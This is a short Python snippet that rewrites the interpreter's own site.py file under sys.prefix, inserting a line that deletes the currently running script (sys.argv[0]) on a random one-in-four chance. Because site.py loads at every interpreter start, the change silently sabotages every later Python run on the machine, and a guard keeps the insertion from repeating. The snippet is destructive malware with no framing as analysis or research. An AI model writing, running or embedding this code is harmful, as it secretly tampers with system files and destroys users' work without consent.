p=os.path.join(sys.prefix,"lib","site.py")
c=open(p,'r').read()
(open(p,'w').write(c.replace("if __n","os.remove(sys.argv[0])if __import__('random').randint(1,4)==2else...\nif __n")))if'os.r'not in c else...